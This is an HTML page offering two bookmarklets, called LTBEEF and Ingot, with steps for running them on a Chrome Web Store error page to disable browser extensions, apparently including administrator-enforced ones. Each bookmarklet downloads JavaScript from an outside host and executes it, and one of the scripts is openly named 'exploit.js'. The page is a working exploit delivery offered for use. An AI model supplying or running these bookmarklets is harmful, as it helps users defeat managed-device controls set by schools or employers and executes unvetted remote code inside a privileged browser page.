<!DOCTYPE html>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>LTBEEF and Ingot Tools</title>
    <meta name="description" content="Tools for LTBEEF and Ingot created by Bypassi and Nebelung.">
    <style>
        body {
            background-color: #121212;
            color: #ffffff;
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 20px;
            text-align: center;
        }
        
        .button {
            display: block;
            cursor: pointer;
            background: #fff;
            font-size: 18px;
            color: #000;
            padding: 10px;
            border-radius: 30px;
            font-weight: 400;
            line-height: 1.4rem;
            box-shadow: 0 2px 0 black;
            text-decoration: none;
            width: 8rem;
            margin: 10px auto;
        }

        .button.ingot {
            box-shadow: 0 2px 0 lightblue;
        }

        .info {
            margin-top: 20px;
            line-height: 1.5;
        }

        a {
            color: aqua;
            text-decoration: none;
        }
        
        a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div>
        <br>
        <a href="javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});" class="button"><strong>LTBEEF</strong></a>
        <a href="javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())" class="button ingot"><strong>Ingot</strong></a>
        <br>
        <p class="info">
            - LTBEEF Created By Bypassi (Bypassi), Ingot Created By Nebelung (Nebelung)<br><br>
            - Drag either of the above buttons to your bookmarks bar<br><br>
            - Visit <a href="https://chrome.google.com/webstore_" style="color:aqua">https://chrome.google.com/webstore</a>. (This is a 404 page, and that is ok. )<br><br>
            - Click the bookmark (<strong>NOTE: This only works on the Chrome Web Store.</strong>)<br><br>
            - Switch off the extensions you don't want to have anymore.<br><br>
            You're done! The extension should now be disabled.
        </p>
    </div>
</body>
</html>
